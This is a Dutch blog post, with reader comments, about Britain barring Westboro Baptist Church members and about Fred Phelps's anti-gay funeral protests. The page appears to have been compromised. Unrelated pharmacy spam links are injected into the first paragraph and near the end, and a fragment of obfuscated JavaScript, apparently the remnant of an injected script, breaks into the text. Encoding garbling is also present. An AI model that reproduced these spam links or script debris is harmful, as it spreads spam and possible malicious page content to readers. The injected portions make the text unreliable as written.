Engeland is in ieder geval consequent

Niet alleen Geert Wilders wordt geweerd uit Groot-BrittanniAi??. Ook leden van de Westboro Baptist Church zullen voortaan direct worden teruggestuurd op het vliegveld. http://www.the-main-ingredient.com/over-the-counter-antivert/ http://toyotadana.com/seroquel-25-mg-cost/

"We're not in Kansas anymore." Geen woorden die Phelps snel zal uitspreken.

Wat is de Westboro Baptist Church? Misschien doet de naam niet direct een kwartje vallen, maar waarschijnlijk kent iedereen deze verzameling twijfelachtige individuen wel. Het is een klein aantal zAi??Ai??r radicale en fundamentalistische Christenen dat opereert vanuit Topeka, Kansas in de Verenigde Staten. Opperhoofd Fred Phelps (geen familie van de vredelievende sportheld Michael Phelps) is een kafter van de eerste orde die in zijn Bijbel een boekenlegger heeft vast gelijmd bij Leviticus 18:22. Kortom: de man heeft het niet zo op homoseksualiteit.

Nu zijn er wel meer Christenen die moeite hebben met mensen die een voorkeur genieten voor het eigen geslacht, maar meneer Phelps en zijn volgelingen laten dit op een nogal verwerpelijke manier aan hun omgeving merken. De Westboro Baptist Church is berucht om haar demonstraties, vaak in de nabijheid van begrafenissen van bekende homoseksuelen en Amerikaanse soldaten. Spandoeken en borden met teksten als God Hates Fags en Thank God For Aids worden hierbij niet geschuwd. Phelps meent namelijk dat al het leed in Amerika (inclusief de gebeurtenissen van 11 september 2001) een straf van God is, omdat de V.S. een te tolerante positie innemen ten opzichte van homoseksualteit.

De Westboro Baptist Church is vanaf heden niet langer welkom in Groot-BrittanniAi??. De Engelse douane heeft dat besloten nadat bekend werd dat Fred Phelps van plan was te demonstreren bij de premiere van het toneelstuk The Lamarie Project, dat verhaalt over een jongeman die vermoord wordt om zijn geaardheid. igator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} Price for cozaar 50 mg


1 ster2 sterren3 sterren4 sterren5 sterren
(nog geen stemmen)
Loading ... Loading ...
Link naar deze pagina
Maak favoriet
Mail ons!
<<< Ga terug

Over de auteur

Zoon van Robert, kleinzoon van Laurens, kind van andere tijden, meester der luiheid, verleider der vunzigheid, brouwer des ongenoegens. En nog meer van die zotheden.

6 Reacties op “Engeland is in ieder geval consequent”

 1. één van mijn favoriete documakers, louis theroux, heeft eens drie weken bij deze mensen doorgebracht, wat dit schrijnende pareltje heeft opgeleverd:
  http://vodpod.com/watch/453706-louis-theroux-westboro-baptist-church

 2. En da’s een must-see!

 3. Absoluut.

  Bedankt voor de link meneer von brown. ;)

 4. Louis Theroux is een held

 5. Pak ook Michael Moore en zijn ‘Sodomobile’ even mee:
  http://vodpod.com/watch/533610-michael-moore-vs-westboro-baptist-church

Laat een bericht achter